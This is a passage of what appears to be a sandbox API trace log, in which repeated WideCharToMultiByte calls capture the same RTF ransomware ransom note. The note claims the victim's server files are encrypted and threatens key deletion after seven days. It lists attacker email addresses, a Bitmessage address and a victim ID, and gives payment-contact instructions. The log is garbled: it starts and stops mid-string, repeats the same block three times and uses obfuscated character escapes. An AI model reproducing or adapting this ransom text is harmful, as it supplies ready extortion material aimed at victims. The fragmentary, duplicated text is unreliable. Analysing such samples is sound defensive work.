B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd 